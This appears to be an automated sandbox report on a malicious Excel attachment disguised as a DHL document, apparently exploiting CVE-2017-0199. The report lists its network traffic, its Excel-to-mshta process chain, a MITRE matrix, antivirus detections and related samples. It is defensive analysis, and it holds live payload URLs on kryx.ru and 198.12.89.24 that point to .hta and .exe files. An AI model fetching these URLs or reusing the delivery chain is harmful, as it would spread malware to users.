Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficHTTP traffic detected: GET /RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: global trafficDNS traffic detected: DNS query: kryx.ru
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: DHL 733988905ZHH.xla.xlsxString found in binary or memory: https://kryx.ru/RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49701 version: TLS 1.2

System Summary

barindex
Excel sheet contains many unusual embedded objects
Source: DHL 733988905ZHH.xla.xlsxOLE: Microsoft Excel 2007+
Source: DHL 733988905ZHH.xla.xlsxOLE: Microsoft Excel 2007+
Source: DHL 733988905ZHH.xla.xlsxOLE indicator, VBA macros: true
Source: DHL 733988905ZHH.xla.xlsxStream path 'MBD0077BD8A/\x1Ole' : https://kryx.ru/RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiarydEss!yV>k1eKoKip8Wf0hwt2LFXIi14AWl1qEQDJ5YR6EfN4pxyBfHcKFCk7YqRImBuRUXvYJ6cKIIIZvDqFguXpVlcwuI8Rm7Xoyloy8obEYadnu0ZQ8ZxRZhrxKrqO7bpUYYDAWFM1NDUeYf8hAL4j9QhC267CjBezpSMIwjJhwl7YrIyxtFIJDzimDriWoNCc9CZqy1TIHBZ8EU511fpW66IVXALAn7BghaFnWkKe3ZBZJdyX906xL+LWmYIUbR!bf}
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'dhl 733988905zhh.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal68.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DHL 733988905ZHH.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{654EFC21-2E48-4D10-8EBC-D28DFFB42477} - OProcSessId.datJump to behavior
Source: DHL 733988905ZHH.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: DHL 733988905ZHH.xla.xlsxVirustotal: Detection: 50%
Source: DHL 733988905ZHH.xla.xlsxReversingLabs: Detection: 33%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL 733988905ZHH.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: DHL 733988905ZHH.xla.xlsxStatic file information: File size 1172992 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: DHL 733988905ZHH.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: DHL 733988905ZHH.xla.xlsxStream path 'MBD0077BD89/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: DHL 733988905ZHH.xla.xlsxStream path 'Workbook' entropy: 7.99152403099 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 823Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
DHL 733988905ZHH.xla.xlsx50%VirustotalBrowse
DHL 733988905ZHH.xla.xlsx33%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
DHL 733988905ZHH.xla.xlsx100%AviraW97M/AVI.Agent.dfbax

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://kryx.ru/RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    		high
    kryx.ru
    		188.225.72.170
    		truefalse
      		unknown
      s-0005.dual-s-msedge.net
      		52.123.128.14
      		truefalse
        		high
        s-part-0032.t-0009.t-msedge.net
        		13.107.246.60
        		truefalse
          		high
          otelrules.svc.static.microsoft
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
              		high
              https://kryx.ru/RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiaryfalse
              • Avira URL Cloud: safe
              		unknown
              https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                		high
                https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  198.12.89.24
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUSfalse
                  188.225.72.170
                  		kryx.ruRussian Federation
                  		9123TIMEWEB-ASRUfalse
                  13.107.246.60
                  		s-part-0032.t-0009.t-msedge.netUnited States
                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1639267
                  Start date and time:2025-03-15 08:43:15 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:DHL 733988905ZHH.xla.xlsx
                  Detection:MAL
                  Classification:mal68.expl.winXLSX@6/4@2/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                  • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.68.129, 23.60.203.209, 199.232.214.172, 13.89.179.13, 23.199.214.10, 52.109.28.46, 104.208.16.91, 52.123.128.14, 20.190.159.23, 4.175.87.197
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, onedscolprdcus17.centralus.cloudapp.azure.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, onedscolprdcus21.centralus.cloudapp.azure.com, login.live.com, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, config.officeapps.live.com, ecs.office.trafficmanager.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:45:12API Interceptor849x Sleep call for process: splwow64.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  198.12.89.24wekissingbestgirleveryseenwithmygirl.htaGet hashmaliciousCobalt Strike, Snake Keylogger, VIP KeyloggerBrowse
                  • 198.12.89.24/312/cosse.exe
                  signed contract 01.xlsGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/nso/wekissingbestgirleveryseenwithmygirl.hta
                  signed contract 01.xlsGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/nso/wekissingbestgirleveryseenwithmygirl.hta
                  niceworkingskillwithbestideasevermade.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                  • 198.12.89.24/123/casse.exe
                  Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/ncv/niceworkingskillwithbestideasevermade.hta
                  188.225.72.170_________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                    _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                      13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                      • www.mimecast.com/Customers/Support/Contact-support/
                      http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                      • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      kryx.ru_________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      s-part-0032.t-0009.t-msedge.net(Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      Wacatac 0.5.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      Wacatac 0.5.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      Sweepingcorp00990__098.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 13.107.246.60
                      https://trezorewllet.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                      • 13.107.246.60
                      https://auth-app---crypto-sso--web-ced-cdn.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                      • 13.107.246.60
                      SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      https://sp-track.info.socialmaud.digital/api/v1/track/click/355/30046/17/default/6b7d5c97-8b19-4c41-b355-64ecd84af44a?redirecturl=https://gamma.app/docs/POM-Technologies-Proposal-1tjhhormn8i5mpbGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                      • 13.107.246.60
